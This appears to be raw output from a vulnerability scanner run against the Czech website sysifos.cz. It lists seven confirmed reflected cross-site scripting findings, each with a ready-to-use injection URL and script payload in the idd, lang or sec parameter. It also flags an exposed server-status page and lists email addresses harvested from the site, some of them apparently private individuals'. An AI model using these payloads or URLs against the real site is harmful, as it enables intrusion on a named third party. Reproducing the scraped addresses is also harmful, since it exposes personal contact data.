sysifos.cz

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. URL: http://www.sysifos.cz/index.php?id=homepage&idd='"--></style></script><script>alert(0x000037)</script>&last=3
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: idd
8. Parameter Type: Querystring
9. Attack Pattern: '"--></style></script><script>alert(0x000037)</script>
10.  
11. Severity: Important
12. Confirmation: Confirmed
13. URL: http://www.sysifos.cz/index.php?id=hledat&lang='"--></style></script><script>alert(0x000036)</script>
14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
15. Parameter Name: lang
16. Parameter Type: Querystring
17. Attack Pattern: '"--></style></script><script>alert(0x000036)</script>
18.  
19. Severity: Important
20. Confirmation: Confirmed
21. URL: http://www.sysifos.cz/index.php?id=archiv&idd='"--></style></script><script>alert(0x000072)</script>
22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
23. Parameter Name: idd
24. Parameter Type: Querystring
25. Attack Pattern: '"--></style></script><script>alert(0x000072)</script>
26.  
27. Severity: Important
28. Confirmation: Confirmed
29. URL: http://www.sysifos.cz/index.php?id=homepage&idd=all&lang='"--></style></script><script>alert(0x000073)</script>
30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
31. Parameter Name: lang
32. Parameter Type: Querystring
33. Attack Pattern: '"--></style></script><script>alert(0x000073)</script>
34.  
35. Severity: Important
36. Confirmation: Confirmed
37. URL: http://www.sysifos.cz/index.php?id=vypis&sec='"--></style></script><script>alert(0x0000AE)</script>
38. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
39. Parameter Name: sec
40. Parameter Type: Querystring
41. Attack Pattern: '"--></style></script><script>alert(0x0000AE)</script>
42.  
43. Severity: Important
44. Confirmation: Confirmed
45. URL: http://www.sysifos.cz/index.php?id=vypis&kategorie_odkaz=novinky&sec='"--></style></script><script>alert(0x0000DF)</script>
46. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
47. Parameter Name: sec
48. Parameter Type: Querystring
49. Attack Pattern: '"--></style></script><script>alert(0x0000DF)</script>
50.  
51. Severity: Important
52. Confirmation: Confirmed
53. URL: http://www.sysifos.cz/tisk.php?id=vypis&sec='"--></style></script><script>alert(0x000298)</script>
54. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
55. Parameter Name: sec
56. Parameter Type: Querystring
57. Attack Pattern: '"--></style></script><script>alert(0x000298)</script>
58.  
59.  
60. ||| Severity : Medium
61. Confirmation: Confirmed
62. URL: http://www.sysifos.cz/server-status
63. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CWE-16
64.  
65. ||| E-mail Address Disclosure
66.  
67. Severity: Information
68. Confirmation: Confirmed
69. URL: http://www.sysifos.cz/
70.  
71. Found E-mails:
72.  
73. zdenek.jonak@hotmail.com
74. vybor@sisyfos.cz
75. milionovacena@sisyfos.cz
76. dotazy@sisyfos.cz
77. kevinh@kevcom.com
78. mike@hyperreal.org
79. zdravi@studiohedis.cz
80. ivahedlova@volny.cz
81. hudec@vasilcuk.cz